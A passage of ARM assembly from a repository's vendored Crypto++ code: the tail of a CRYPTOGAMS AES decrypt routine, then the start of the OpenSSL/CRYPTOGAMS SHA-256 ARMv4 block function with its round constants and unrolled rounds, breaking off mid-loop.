ldr r6,[r11,#12]
eor r0,r0,r7
eor r1,r1,r4
eor r2,r2,r5
eor r3,r3,r6
sub r10,r10,#1024 @ restore table pointer
ldr pc,[sp],#4 @ pop and return
.size _cryptogams_armv4_AES_decrypt_block,.-_cryptogams_armv4_AES_decrypt_block
|
Akhil-Sharma-26/yeet
| 59,489
|
external/cryptopp/sha256_armv4.S
|
@ Copyright 2007-2019 The OpenSSL Project Authors. All Rights Reserved.
@
@ ====================================================================
@ Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
@ project. The module is, however, dual licensed under OpenSSL and
@ CRYPTOGAMS licenses depending on where you obtain it. For further
@ details see http://www.openssl.org/~appro/cryptogams/.
@ ====================================================================
@ JW, MAY 2019: Begin defines from taken from arm_arch.h
@ The defines were included through the header.
# if !defined(__ARM_ARCH__)
# if defined(__CC_ARM)
# define __ARM_ARCH__ __TARGET_ARCH_ARM
# if defined(__BIG_ENDIAN)
# define __ARMEB__
# else
# define __ARMEL__
# endif
# elif defined(__GNUC__)
# if defined(__aarch64__)
# define __ARM_ARCH__ 8
# if __BYTE_ORDER__==__ORDER_BIG_ENDIAN__
# define __ARMEB__
# else
# define __ARMEL__
# endif
# elif defined(__ARM_ARCH)
# define __ARM_ARCH__ __ARM_ARCH
# elif defined(__ARM_ARCH_8A__)
# define __ARM_ARCH__ 8
# elif defined(__ARM_ARCH_7__) || defined(__ARM_ARCH_7A__) || \
defined(__ARM_ARCH_7R__)|| defined(__ARM_ARCH_7M__) || \
defined(__ARM_ARCH_7EM__)
# define __ARM_ARCH__ 7
# elif defined(__ARM_ARCH_6__) || defined(__ARM_ARCH_6J__) || \
defined(__ARM_ARCH_6K__)|| defined(__ARM_ARCH_6M__) || \
defined(__ARM_ARCH_6Z__)|| defined(__ARM_ARCH_6ZK__) || \
defined(__ARM_ARCH_6T2__)
# define __ARM_ARCH__ 6
# elif defined(__ARM_ARCH_5__) || defined(__ARM_ARCH_5T__) || \
defined(__ARM_ARCH_5E__)|| defined(__ARM_ARCH_5TE__) || \
defined(__ARM_ARCH_5TEJ__)
# define __ARM_ARCH__ 5
# elif defined(__ARM_ARCH_4__) || defined(__ARM_ARCH_4T__)
# define __ARM_ARCH__ 4
# else
# error "unsupported ARM architecture"
# endif
# endif
# endif
# if !defined(__ARM_MAX_ARCH__)
# define __ARM_MAX_ARCH__ __ARM_ARCH__
# endif
# if __ARM_MAX_ARCH__<__ARM_ARCH__
# error "__ARM_MAX_ARCH__ can't be less than __ARM_ARCH__"
# elif __ARM_MAX_ARCH__!=__ARM_ARCH__
# if __ARM_ARCH__<7 && __ARM_MAX_ARCH__>=7 && defined(__ARMEB__)
# error "can't build universal big-endian binary"
# endif
# endif
# define CRYPTOGAMS_ARMV7_NEON (1<<0)
@ JW, MAY 2019: End defines from taken from arm_arch.h
@ Back to original Cryptogams code
#if defined(__thumb2__)
.syntax unified
.thumb
#else
.code 32
#endif
.text
@ K256: the 64 32-bit SHA-256 round constants (FIPS 180-4), consumed
@ sequentially by the compression loop ("ldr r12,[r14],#4 @ *K256++").
.type K256,%object
.align 5
K256:
.word 0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5
.word 0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5
.word 0xd807aa98,0x12835b01,0x243185be,0x550c7dc3
.word 0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174
.word 0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc
.word 0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da
.word 0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7
.word 0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967
.word 0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13
.word 0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85
.word 0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3
.word 0xd192e819,0xd6990624,0xf40e3585,0x106aa070
.word 0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5
.word 0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3
.word 0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208
.word 0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2
.size K256,.-K256
.word 0 @ terminator
.align 5
.globl cryptogams_sha256_block_data_order
.type cryptogams_sha256_block_data_order,%function
cryptogams_sha256_block_data_order:
.Lcryptogams_sha256_block_data_order:
#if __ARM_ARCH__<7 && !defined(__thumb2__)
sub r3,pc,#8 @ cryptogams_sha256_block_data_order
#else
adr r3,.Lcryptogams_sha256_block_data_order
#endif
add r2,r1,r2,lsl#6 @ len to point at the end of inp
stmdb sp!,{r0,r1,r2,r4-r11,lr}
ldmia r0,{r4,r5,r6,r7,r8,r9,r10,r11}
sub r14,r3,#256+32 @ K256
sub sp,sp,#16*4 @ alloca(X[16])
.Loop:
# if __ARM_ARCH__>=7
ldr r2,[r1],#4
# else
ldrb r2,[r1,#3]
# endif
eor r3,r5,r6 @ magic
eor r12,r12,r12
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 0
# if 0==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r8,r8,ror#5
add r4,r4,r12 @ h+=Maj(a,b,c) from the past
eor r0,r0,r8,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 0
add r4,r4,r12 @ h+=Maj(a,b,c) from the past
ldrb r12,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r12,lsl#8
ldrb r12,[r1],#4
orr r2,r2,r0,lsl#16
# if 0==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r8,r8,ror#5
orr r2,r2,r12,lsl#24
eor r0,r0,r8,ror#19 @ Sigma1(e)
#endif
ldr r12,[r14],#4 @ *K256++
add r11,r11,r2 @ h+=X[i]
str r2,[sp,#0*4]
eor r2,r9,r10
add r11,r11,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r8
add r11,r11,r12 @ h+=K256[i]
eor r2,r2,r10 @ Ch(e,f,g)
eor r0,r4,r4,ror#11
add r11,r11,r2 @ h+=Ch(e,f,g)
#if 0==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 0<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r4,r5 @ a^b, b^c in next round
#else
ldr r2,[sp,#2*4] @ from future BODY_16_xx
eor r12,r4,r5 @ a^b, b^c in next round
ldr r1,[sp,#15*4] @ from future BODY_16_xx
#endif
eor r0,r0,r4,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r7,r7,r11 @ d+=h
eor r3,r3,r5 @ Maj(a,b,c)
add r11,r11,r0,ror#2 @ h+=Sigma0(a)
@ add r11,r11,r3 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 1
# if 1==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r7,r7,ror#5
add r11,r11,r3 @ h+=Maj(a,b,c) from the past
eor r0,r0,r7,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 1
add r11,r11,r3 @ h+=Maj(a,b,c) from the past
ldrb r3,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r3,lsl#8
ldrb r3,[r1],#4
orr r2,r2,r0,lsl#16
# if 1==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r7,r7,ror#5
orr r2,r2,r3,lsl#24
eor r0,r0,r7,ror#19 @ Sigma1(e)
#endif
ldr r3,[r14],#4 @ *K256++
add r10,r10,r2 @ h+=X[i]
str r2,[sp,#1*4]
eor r2,r8,r9
add r10,r10,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r7
add r10,r10,r3 @ h+=K256[i]
eor r2,r2,r9 @ Ch(e,f,g)
eor r0,r11,r11,ror#11
add r10,r10,r2 @ h+=Ch(e,f,g)
#if 1==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 1<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r11,r4 @ a^b, b^c in next round
#else
ldr r2,[sp,#3*4] @ from future BODY_16_xx
eor r3,r11,r4 @ a^b, b^c in next round
ldr r1,[sp,#0*4] @ from future BODY_16_xx
#endif
eor r0,r0,r11,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r6,r6,r10 @ d+=h
eor r12,r12,r4 @ Maj(a,b,c)
add r10,r10,r0,ror#2 @ h+=Sigma0(a)
@ add r10,r10,r12 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 2
# if 2==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r6,r6,ror#5
add r10,r10,r12 @ h+=Maj(a,b,c) from the past
eor r0,r0,r6,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 2
add r10,r10,r12 @ h+=Maj(a,b,c) from the past
ldrb r12,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r12,lsl#8
ldrb r12,[r1],#4
orr r2,r2,r0,lsl#16
# if 2==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r6,r6,ror#5
orr r2,r2,r12,lsl#24
eor r0,r0,r6,ror#19 @ Sigma1(e)
#endif
ldr r12,[r14],#4 @ *K256++
add r9,r9,r2 @ h+=X[i]
str r2,[sp,#2*4]
eor r2,r7,r8
add r9,r9,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r6
add r9,r9,r12 @ h+=K256[i]
eor r2,r2,r8 @ Ch(e,f,g)
eor r0,r10,r10,ror#11
add r9,r9,r2 @ h+=Ch(e,f,g)
#if 2==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 2<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r10,r11 @ a^b, b^c in next round
#else
ldr r2,[sp,#4*4] @ from future BODY_16_xx
eor r12,r10,r11 @ a^b, b^c in next round
ldr r1,[sp,#1*4] @ from future BODY_16_xx
#endif
eor r0,r0,r10,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r5,r5,r9 @ d+=h
eor r3,r3,r11 @ Maj(a,b,c)
add r9,r9,r0,ror#2 @ h+=Sigma0(a)
@ add r9,r9,r3 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 3
# if 3==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r5,r5,ror#5
add r9,r9,r3 @ h+=Maj(a,b,c) from the past
eor r0,r0,r5,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 3
add r9,r9,r3 @ h+=Maj(a,b,c) from the past
ldrb r3,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r3,lsl#8
ldrb r3,[r1],#4
orr r2,r2,r0,lsl#16
# if 3==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r5,r5,ror#5
orr r2,r2,r3,lsl#24
eor r0,r0,r5,ror#19 @ Sigma1(e)
#endif
ldr r3,[r14],#4 @ *K256++
add r8,r8,r2 @ h+=X[i]
str r2,[sp,#3*4]
eor r2,r6,r7
add r8,r8,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r5
add r8,r8,r3 @ h+=K256[i]
eor r2,r2,r7 @ Ch(e,f,g)
eor r0,r9,r9,ror#11
add r8,r8,r2 @ h+=Ch(e,f,g)
#if 3==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 3<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r9,r10 @ a^b, b^c in next round
#else
ldr r2,[sp,#5*4] @ from future BODY_16_xx
eor r3,r9,r10 @ a^b, b^c in next round
ldr r1,[sp,#2*4] @ from future BODY_16_xx
#endif
eor r0,r0,r9,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r4,r4,r8 @ d+=h
eor r12,r12,r10 @ Maj(a,b,c)
add r8,r8,r0,ror#2 @ h+=Sigma0(a)
@ add r8,r8,r12 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 4
# if 4==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r4,r4,ror#5
add r8,r8,r12 @ h+=Maj(a,b,c) from the past
eor r0,r0,r4,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 4
add r8,r8,r12 @ h+=Maj(a,b,c) from the past
ldrb r12,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r12,lsl#8
ldrb r12,[r1],#4
orr r2,r2,r0,lsl#16
# if 4==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r4,r4,ror#5
orr r2,r2,r12,lsl#24
eor r0,r0,r4,ror#19 @ Sigma1(e)
#endif
ldr r12,[r14],#4 @ *K256++
add r7,r7,r2 @ h+=X[i]
str r2,[sp,#4*4]
eor r2,r5,r6
add r7,r7,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r4
add r7,r7,r12 @ h+=K256[i]
eor r2,r2,r6 @ Ch(e,f,g)
eor r0,r8,r8,ror#11
add r7,r7,r2 @ h+=Ch(e,f,g)
#if 4==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 4<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r8,r9 @ a^b, b^c in next round
#else
ldr r2,[sp,#6*4] @ from future BODY_16_xx
eor r12,r8,r9 @ a^b, b^c in next round
ldr r1,[sp,#3*4] @ from future BODY_16_xx
#endif
eor r0,r0,r8,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r11,r11,r7 @ d+=h
eor r3,r3,r9 @ Maj(a,b,c)
add r7,r7,r0,ror#2 @ h+=Sigma0(a)
@ add r7,r7,r3 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 5
# if 5==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r11,r11,ror#5
add r7,r7,r3 @ h+=Maj(a,b,c) from the past
eor r0,r0,r11,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 5
add r7,r7,r3 @ h+=Maj(a,b,c) from the past
ldrb r3,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r3,lsl#8
ldrb r3,[r1],#4
orr r2,r2,r0,lsl#16
# if 5==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r11,r11,ror#5
orr r2,r2,r3,lsl#24
eor r0,r0,r11,ror#19 @ Sigma1(e)
#endif
ldr r3,[r14],#4 @ *K256++
add r6,r6,r2 @ h+=X[i]
str r2,[sp,#5*4]
eor r2,r4,r5
add r6,r6,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r11
add r6,r6,r3 @ h+=K256[i]
eor r2,r2,r5 @ Ch(e,f,g)
eor r0,r7,r7,ror#11
add r6,r6,r2 @ h+=Ch(e,f,g)
#if 5==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 5<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r7,r8 @ a^b, b^c in next round
#else
ldr r2,[sp,#7*4] @ from future BODY_16_xx
eor r3,r7,r8 @ a^b, b^c in next round
ldr r1,[sp,#4*4] @ from future BODY_16_xx
#endif
eor r0,r0,r7,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r10,r10,r6 @ d+=h
eor r12,r12,r8 @ Maj(a,b,c)
add r6,r6,r0,ror#2 @ h+=Sigma0(a)
@ add r6,r6,r12 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 6
# if 6==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r10,r10,ror#5
add r6,r6,r12 @ h+=Maj(a,b,c) from the past
eor r0,r0,r10,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 6
add r6,r6,r12 @ h+=Maj(a,b,c) from the past
ldrb r12,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r12,lsl#8
ldrb r12,[r1],#4
orr r2,r2,r0,lsl#16
# if 6==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r10,r10,ror#5
orr r2,r2,r12,lsl#24
eor r0,r0,r10,ror#19 @ Sigma1(e)
#endif
ldr r12,[r14],#4 @ *K256++
add r5,r5,r2 @ h+=X[i]
str r2,[sp,#6*4]
eor r2,r11,r4
add r5,r5,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r10
add r5,r5,r12 @ h+=K256[i]
eor r2,r2,r4 @ Ch(e,f,g)
eor r0,r6,r6,ror#11
add r5,r5,r2 @ h+=Ch(e,f,g)
#if 6==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 6<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r6,r7 @ a^b, b^c in next round
#else
ldr r2,[sp,#8*4] @ from future BODY_16_xx
eor r12,r6,r7 @ a^b, b^c in next round
ldr r1,[sp,#5*4] @ from future BODY_16_xx
#endif
eor r0,r0,r6,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r9,r9,r5 @ d+=h
eor r3,r3,r7 @ Maj(a,b,c)
add r5,r5,r0,ror#2 @ h+=Sigma0(a)
@ add r5,r5,r3 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 7
# if 7==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r9,r9,ror#5
add r5,r5,r3 @ h+=Maj(a,b,c) from the past
eor r0,r0,r9,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 7
add r5,r5,r3 @ h+=Maj(a,b,c) from the past
ldrb r3,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r3,lsl#8
ldrb r3,[r1],#4
orr r2,r2,r0,lsl#16
# if 7==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r9,r9,ror#5
orr r2,r2,r3,lsl#24
eor r0,r0,r9,ror#19 @ Sigma1(e)
#endif
ldr r3,[r14],#4 @ *K256++
add r4,r4,r2 @ h+=X[i]
str r2,[sp,#7*4]
eor r2,r10,r11
add r4,r4,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r9
add r4,r4,r3 @ h+=K256[i]
eor r2,r2,r11 @ Ch(e,f,g)
eor r0,r5,r5,ror#11
add r4,r4,r2 @ h+=Ch(e,f,g)
#if 7==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 7<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r5,r6 @ a^b, b^c in next round
#else
ldr r2,[sp,#9*4] @ from future BODY_16_xx
eor r3,r5,r6 @ a^b, b^c in next round
ldr r1,[sp,#6*4] @ from future BODY_16_xx
#endif
eor r0,r0,r5,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r8,r8,r4 @ d+=h
eor r12,r12,r6 @ Maj(a,b,c)
add r4,r4,r0,ror#2 @ h+=Sigma0(a)
@ add r4,r4,r12 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 8
# if 8==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r8,r8,ror#5
add r4,r4,r12 @ h+=Maj(a,b,c) from the past
eor r0,r0,r8,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 8
add r4,r4,r12 @ h+=Maj(a,b,c) from the past
ldrb r12,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r12,lsl#8
ldrb r12,[r1],#4
orr r2,r2,r0,lsl#16
# if 8==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r8,r8,ror#5
orr r2,r2,r12,lsl#24
eor r0,r0,r8,ror#19 @ Sigma1(e)
#endif
ldr r12,[r14],#4 @ *K256++
add r11,r11,r2 @ h+=X[i]
str r2,[sp,#8*4]
eor r2,r9,r10
add r11,r11,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r8
add r11,r11,r12 @ h+=K256[i]
eor r2,r2,r10 @ Ch(e,f,g)
eor r0,r4,r4,ror#11
add r11,r11,r2 @ h+=Ch(e,f,g)
#if 8==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 8<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r4,r5 @ a^b, b^c in next round
#else
ldr r2,[sp,#10*4] @ from future BODY_16_xx
eor r12,r4,r5 @ a^b, b^c in next round
ldr r1,[sp,#7*4] @ from future BODY_16_xx
#endif
eor r0,r0,r4,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r7,r7,r11 @ d+=h
eor r3,r3,r5 @ Maj(a,b,c)
add r11,r11,r0,ror#2 @ h+=Sigma0(a)
@ add r11,r11,r3 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 9
# if 9==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r7,r7,ror#5
add r11,r11,r3 @ h+=Maj(a,b,c) from the past
eor r0,r0,r7,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 9
add r11,r11,r3 @ h+=Maj(a,b,c) from the past
ldrb r3,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r3,lsl#8
ldrb r3,[r1],#4
orr r2,r2,r0,lsl#16
# if 9==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r7,r7,ror#5
orr r2,r2,r3,lsl#24
eor r0,r0,r7,ror#19 @ Sigma1(e)
#endif
ldr r3,[r14],#4 @ *K256++
add r10,r10,r2 @ h+=X[i]
str r2,[sp,#9*4]
eor r2,r8,r9
add r10,r10,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r7
add r10,r10,r3 @ h+=K256[i]
eor r2,r2,r9 @ Ch(e,f,g)
eor r0,r11,r11,ror#11
add r10,r10,r2 @ h+=Ch(e,f,g)
#if 9==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 9<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r11,r4 @ a^b, b^c in next round
#else
ldr r2,[sp,#11*4] @ from future BODY_16_xx
eor r3,r11,r4 @ a^b, b^c in next round
ldr r1,[sp,#8*4] @ from future BODY_16_xx
#endif
eor r0,r0,r11,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r6,r6,r10 @ d+=h
eor r12,r12,r4 @ Maj(a,b,c)
add r10,r10,r0,ror#2 @ h+=Sigma0(a)
@ add r10,r10,r12 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 10
# if 10==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r6,r6,ror#5
add r10,r10,r12 @ h+=Maj(a,b,c) from the past
eor r0,r0,r6,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 10
add r10,r10,r12 @ h+=Maj(a,b,c) from the past
ldrb r12,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r12,lsl#8
ldrb r12,[r1],#4
orr r2,r2,r0,lsl#16
# if 10==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r6,r6,ror#5
orr r2,r2,r12,lsl#24
eor r0,r0,r6,ror#19 @ Sigma1(e)
#endif
ldr r12,[r14],#4 @ *K256++
add r9,r9,r2 @ h+=X[i]
str r2,[sp,#10*4]
eor r2,r7,r8
add r9,r9,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r6
add r9,r9,r12 @ h+=K256[i]
eor r2,r2,r8 @ Ch(e,f,g)
eor r0,r10,r10,ror#11
add r9,r9,r2 @ h+=Ch(e,f,g)
#if 10==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 10<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r10,r11 @ a^b, b^c in next round
#else
ldr r2,[sp,#12*4] @ from future BODY_16_xx
eor r12,r10,r11 @ a^b, b^c in next round
ldr r1,[sp,#9*4] @ from future BODY_16_xx
#endif
eor r0,r0,r10,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r5,r5,r9 @ d+=h
eor r3,r3,r11 @ Maj(a,b,c)
add r9,r9,r0,ror#2 @ h+=Sigma0(a)
@ add r9,r9,r3 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 11
# if 11==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r5,r5,ror#5
add r9,r9,r3 @ h+=Maj(a,b,c) from the past
eor r0,r0,r5,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 11
add r9,r9,r3 @ h+=Maj(a,b,c) from the past
ldrb r3,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r3,lsl#8
ldrb r3,[r1],#4
orr r2,r2,r0,lsl#16
# if 11==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r5,r5,ror#5
orr r2,r2,r3,lsl#24
eor r0,r0,r5,ror#19 @ Sigma1(e)
#endif
ldr r3,[r14],#4 @ *K256++
add r8,r8,r2 @ h+=X[i]
str r2,[sp,#11*4]
eor r2,r6,r7
add r8,r8,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r5
add r8,r8,r3 @ h+=K256[i]
eor r2,r2,r7 @ Ch(e,f,g)
eor r0,r9,r9,ror#11
add r8,r8,r2 @ h+=Ch(e,f,g)
#if 11==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 11<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r9,r10 @ a^b, b^c in next round
#else
ldr r2,[sp,#13*4] @ from future BODY_16_xx
eor r3,r9,r10 @ a^b, b^c in next round
ldr r1,[sp,#10*4] @ from future BODY_16_xx
#endif
eor r0,r0,r9,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r4,r4,r8 @ d+=h
eor r12,r12,r10 @ Maj(a,b,c)
add r8,r8,r0,ror#2 @ h+=Sigma0(a)
@ add r8,r8,r12 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 12
# if 12==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r4,r4,ror#5
add r8,r8,r12 @ h+=Maj(a,b,c) from the past
eor r0,r0,r4,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 12
add r8,r8,r12 @ h+=Maj(a,b,c) from the past
ldrb r12,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r12,lsl#8
ldrb r12,[r1],#4
orr r2,r2,r0,lsl#16
# if 12==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r4,r4,ror#5
orr r2,r2,r12,lsl#24
eor r0,r0,r4,ror#19 @ Sigma1(e)
#endif
ldr r12,[r14],#4 @ *K256++
add r7,r7,r2 @ h+=X[i]
str r2,[sp,#12*4]
eor r2,r5,r6
add r7,r7,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r4
add r7,r7,r12 @ h+=K256[i]
eor r2,r2,r6 @ Ch(e,f,g)
eor r0,r8,r8,ror#11
add r7,r7,r2 @ h+=Ch(e,f,g)
#if 12==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 12<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r8,r9 @ a^b, b^c in next round
#else
ldr r2,[sp,#14*4] @ from future BODY_16_xx
eor r12,r8,r9 @ a^b, b^c in next round
ldr r1,[sp,#11*4] @ from future BODY_16_xx
#endif
eor r0,r0,r8,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r11,r11,r7 @ d+=h
eor r3,r3,r9 @ Maj(a,b,c)
add r7,r7,r0,ror#2 @ h+=Sigma0(a)
@ add r7,r7,r3 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 13
# if 13==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r11,r11,ror#5
